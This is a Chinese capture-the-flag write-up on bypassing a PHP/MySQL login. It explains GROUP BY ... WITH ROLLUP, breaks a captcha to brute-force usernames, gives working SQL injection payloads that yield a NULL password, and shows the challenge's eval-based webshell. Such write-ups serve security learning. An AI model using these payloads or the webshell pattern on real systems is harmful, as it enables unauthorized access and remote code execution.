初探:
首先打开题目,发现 index.php 是登录界面,寻找 register.php,表单内容如下
<form action="register.php" method="GET">
用户名:iscc_<input type="text" name="uname" placeholder="请输入四位数字" />
<br/><br/>
密码:<input type="password" name="pwd"/>
<br/><br/>
<input type="submit" value="注册">
</form>
可以知道用户名的格式。提交后显示:注册功能已经关闭。
简单测试了一下登录界面发现存在注入,但是过滤了很多关键词,不能直接绕过。于是继续寻找其他信息,在 index.php 的响应头中发现hint
Content-Encoding: gzip
Content-Length: 346
Content-Type: text/html;charset=utf-8
Date: Sun, 29 Jul 2018 02:26:20 GMT
hint: hint.txt
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
hint.txt给出了部分题目源码:
$sql="SELECT pwd FROM user WHERE uname = '{$_POST['uname']}'";
$query = mysqli_query($con,$sql);
if (mysqli_num_rows($query) == 1) {
$key = mysqli_fetch_array($query);
if($key['pwd'] == $_POST['pwd']) {
echo "xxxxxxxxx";
}else{
echo "你这密码不太对啊";
}
}else if(mysqli_num_rows($query) == 0){
echo "你这密码不太对啊";
}
else{
echo "数据太多了";
}
可以看出这里的逻辑就是,我们必须要使得提交的密码与查询出来的结果相同,但是这里的比较用的是==,也就是只需要满足弱类型比较下相等即可。
那么按照常规的思路,就是盲注注出密码,但是因为大多数关键词都被过滤了,所以盲注的思路在这里不可行。
这时要用到 mysql 中的 group by 的 with rollup 子句。
利用 group by … with rollup 巧妙绕过:
什么是 group by … with rollup?
group by ... with rollup 本身当然不是为了方便我们注入而设计的,这个语句在 sql 的数据统计方面有着很强大的功能,在这里简单介绍一下。
我这里用自己手里的 2004-2017 年全国 259 所高校在某地区招生数据做一下演示。
我们知道 group by 语句可以实现对查询的结果分类,比如如果我们想要统计各类高校各有多少所,可以这样:
mysql> select TYPE,count(NAME) from university where YEAR=2017 group by TYPE;
+--------------------------------------------------------------+-------------+
| TYPE | count(NAME) |
+--------------------------------------------------------------+-------------+
| | 135 |
| 211高校/一流大学建设高校 | 3 |
| 211高校/一流学科建设高校 | 30 |
| 211高校/一流学科建设高校/教育部直属 | 36 |
| 211高校/双一流建设学科/教育部直属 | 3 |
| 211高校/教育部直属 | 1 |
| 985高校/211高校 | 2 |
| 985高校/211高校/一流大学建设高校 | 7 |
| 985高校/211高校/一流大学建设高校/教育部直属 | 31 |
| 985高校/211高校/教育部直属 | 1 |
| 一流学科建设高校 | 9 |
| 教育部直属 | 1 |
+--------------------------------------------------------------+-------------+
如果我们还想在最后一行输出一下一共有多少所高校,就可以使用 with rollup子句,他将在最后添加一行数据,用来显示上面的数据的 “汇总” ,注意这个汇总并不是 求和,后面会解释。
mysql> select TYPE,count(NAME) from university WHERE YEAR=2017 group by TYPE WITH ROLLUP;
+--------------------------------------------------------------+-------------+
| TYPE | count(NAME) |
+--------------------------------------------------------------+-------------+
| | 135 |
| 211高校/一流大学建设高校 | 3 |
| 211高校/一流学科建设高校 | 30 |
| 211高校/一流学科建设高校/教育部直属 | 36 |
| 211高校/双一流建设学科/教育部直属 | 3 |
| 211高校/教育部直属 | 1 |
| 985高校/211高校 | 2 |
| 985高校/211高校/一流大学建设高校 | 7 |
| 985高校/211高校/一流大学建设高校/教育部直属 | 31 |
| 985高校/211高校/教育部直属 | 1 |
| 一流学科建设高校 | 9 |
| 教育部直属 | 1 |
| NULL | 259 |
+--------------------------------------------------------------+-------------+
大家可能发现了,在最后一行的数据中,除了数据的汇总,还有一个 NULL,这个NULL是用来表示非统计字段的。
那下面来解释一下,为什么说汇总不是 求和 ,假如我现在想查询各个类型的高校 2017 年在该地区的平均录取分数,并在最后输出所有高校的平均分:
mysql> select TYPE,avg(AVERAGESCORE) from university WHERE YEAR=2017 group by TYPE;
+--------------------------------------------------------------+--------------------+
| TYPE | avg(AVERAGESCORE ) |
+--------------------------------------------------------------+--------------------+
| | 506.14814814814815 |
| 211高校/一流大学建设高校 | 526 |
| 211高校/一流学科建设高校 | 560.8333333333334 |
| 211高校/一流学科建设高校/教育部直属 | 568.9722222222222 |
| 211高校/双一流建设学科/教育部直属 | 563.3333333333334 |
| 211高校/教育部直属 | 594 |
| 985高校/211高校 | 287.5 |
| 985高校/211高校/一流大学建设高校 | 638 |
| 985高校/211高校/一流大学建设高校/教育部直属 | 551.3870967741935 |
| 985高校/211高校/教育部直属 | 0 |
| 一流学科建设高校 | 437.6666666666667 |
| 教育部直属 | 605 |
| NULL | 525.7837837837837 |
+--------------------------------------------------------------+--------------------+
可以看到,最后一行的结果并不是上面查询的结果的和,而是上面数据的平均值。
这样我们就可以看出,with rollup 子句,对数据进一步处理的方式,是由查询数据时,对数据处理使用的函数决定的。
当然,我所演示的,都是一维情况下(只根据一个字段进行分组),使用 with rollup的处理结果,在多维情况下,输出的结果会有一些不同,不过在了解了一维的基础上,也很好理解。这里就不多说了,有兴趣的同学可以看我文章最后附上的参考链接。
如何利用?
接下来回到题目上,我们该如何利用这个语句来绕过登录呢?我们再来看一下题目的源码:
$sql="SELECT pwd FROM user WHERE uname = '{$_POST['uname']}'";
$query = mysqli_query($con,$sql);
if (mysqli_num_rows($query) == 1) {
$key = mysqli_fetch_array($query);
if($key['pwd'] == $_POST['pwd']) {
echo "xxxxxxxxx";
}else{
echo "你这密码不太对啊";
}
既然我们无法猜出密码到底是什么,那么我们可不可以控制查询的结果是我们自己已知的呢?结合上面对group by ... with rollup语句的介绍,我们可以想到,我们可以控制查询的结果为NULL,再结合 PHP 的弱类型 null=='',就可以成功绕过了。
那么我们接下来只需要构造 payload,使得查询结果为 NULL, 但是要想使用group by ... with rollup构造出NULL的一个前提条件,就是查询出的结果不为空,那么我们就需要使 uname = '{$_POST['uname']}'这个条件成立,满足这个条件了,再结合limit和offset 很容易就可以返回的结果为NULL 。
那么如何满足这个前提条件呢?
预期解——利用验证码逻辑漏洞爆破用户名:
结合我们已经掌握的信息,在注册页面我们已经知道账户的格式是 ISCC_+四位数字,这里其实很明显是要我们去爆破,找到这个用户名,而登录的位置存在验证码,正常来讲是不能够爆破的,但是使用 Burpsuite 简单测试一下可以发现,网站并不是在用户提交表单后、判断验证码正确性之后就直接在后端生成新的验证码返回给前端,而是在前端进行请求,进行验证码的更新。也就是说,只要我们拦截/不发送这个请求,验证码就不会更新!
那么我们就可以进行爆破了,构造好 payload:
uname=iscc_0001' group by pwd with rollup limit 1 offset 1#&pwd=&yzm=1448
然后使用 Burpsuite 爆破即可。
在uname=iscc_7980' group by pwd with rollup limit 1 offset 1#&pwd=&yzm=1448 这个payload的回显中发现注入成功。
非预期解——利用 SQL 弱类型构造非预期payload:
其实我们可以更轻松地满足 uname = '{$_POST['uname']}',就是利用 SQL 的弱类型,具体情况与 php 类似,我简单举几个例子,相信大家就能明白了。
mysql> select 'aaaa' = 0;
+------------+
| 'aaaa' = 0 |
+------------+
| 1 |
+------------+
1 row in set, 1 warning (0.00 sec)
mysql> select 'aaaa11' = 0;
+--------------+
| 'aaaa11' = 0 |
+--------------+
| 1 |
+--------------+
1 row in set, 1 warning (0.00 sec)
mysql> select '20aaaa' = 20;
+---------------+
| '20aaaa' = 20 |
+---------------+
| 1 |
+---------------+
1 row in set, 1 warning (0.00 sec)
于是我们可以构造'1'^1=1^1=0=字母开头的字符串 ,使条件被满足。
于是最后的payload:
uname=1'^1 group by pwd with rollup limit 1 offset 1#&pwd=
拼接后的 sql 语句就是:
SELECT pwd FROM user WHERE uname = '1'^1 group by pwd with rollup limit 1 offset 1#'
成功注入。
getflag:
成功注入后,会输出一个字符串
+ADg-d+ADIAMA-d+ADUANw-e+ADI-f+ADIAYgA5AGI-e+ADUALw-f+AGIAMwAw-e+ADcAMA-f+ADcAOAAxADMANAA4ADk-dd+AGE-e+ADcAOQBi-e+ADAANwA5ADIANQBhADMANABhAC4AcABoAHA-
是 utf-7 格式编码的 webshell 地址,
写了个简单的 javascript 解码函数:
function decodeUTF7(data){
var list = data.split('+');
var result= '';
for(var i=0;i<list.length;i++){
if(list[i].length>0){
tmp=list[i].split('-');
result+=atob(tmp[0])+tmp[1];
}
}
return result.replace(/[\u0000-\u0010]/g,'');
}
解码后的结果 8d20d57e2f2b9be5/fb30e70f7813489ddae79be07925a34a.php
访问看到webshell:
<?php
show_source(__FILE__);
$a = @$_REQUEST['a'];
@eval("var_dump($$a);");
?>
相信这个怎么用,就不用我多说了吧!